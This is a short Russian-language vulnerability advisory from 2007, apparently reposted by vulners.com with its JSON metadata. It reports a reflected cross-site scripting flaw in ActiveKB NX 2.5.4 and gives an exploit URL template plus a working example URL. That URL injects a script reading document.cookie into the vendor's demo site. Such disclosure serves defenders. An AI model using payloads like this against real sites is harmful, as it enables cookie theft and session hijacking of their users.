XXS в ActiveKB NX 2.5.4

2007-09-11T00:00:00

Description

Здравствуйте, 3APA3A. Software: ActiveKB NX 2.5.4 Vendor: www.interspire.com Vulnerability: XXS Risk: низкий Date: 1.09.2007 discovered by durito [damagelab] -durito[at]mail[dot]ru- HTTP: durito.narod.ru +~~~:| Details |: Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы. +~~~:| Экплойт |: http://www.target.com/activekb/ActiveKB/?page=[XXS] +~~~:| Пример |: http://www.interspire.com/activekb/demo/default/categories/ActiveKB/?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E -- С уважением, durito [NGH Group] mailto:durito@mail.ru http://durito.narod.ru http://ngh.void.ru

{"id": "SECURITYVULNS:DOC:17956", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "XXS \u0432 ActiveKB NX 2.5.4", "description": "\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435, 3APA3A.\r\n\r\nSoftware: ActiveKB NX 2.5.4\r\n Vendor: www.interspire.com \r\n Vulnerability: XXS \r\n Risk: \u043d\u0438\u0437\u043a\u0438\u0439 \r\n Date: 1.09.2007 \r\n discovered by durito [damagelab] -durito[at]mail[dot]ru- \r\n HTTP: durito.narod.ru \r\n \r\n \r\n +~~~:| Details |: \r\n\r\n \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e URL \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 HTML \u043a\u043e\u0434 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\r\n\r\n +~~~:| \u042d\u043a\u043f\u043b\u043e\u0439\u0442 |: \r\n\r\nhttp://www.target.com/activekb/ActiveKB/?page=[XXS]\r\n\r\n\r\n +~~~:| \u041f\u0440\u0438\u043c\u0435\u0440 |: \r\n\r\nhttp://www.interspire.com/activekb/demo/default/categories/ActiveKB/?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E \r\n\r\n-- \r\n\u0421 \u0443\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c,\r\n durito [NGH Group] mailto:durito@mail.ru\r\nhttp://durito.narod.ru\r\nhttp://ngh.void.ru", "published": "2007-09-11T00:00:00", "modified": "2007-09-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17956", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:23", "viewCount": 2777, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8131"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": -0.1}, "_state": {"dependencies": 1678962117, "score": 1698853398, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "4dc5ed5cf8043ee72661e4b7ff072b94"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}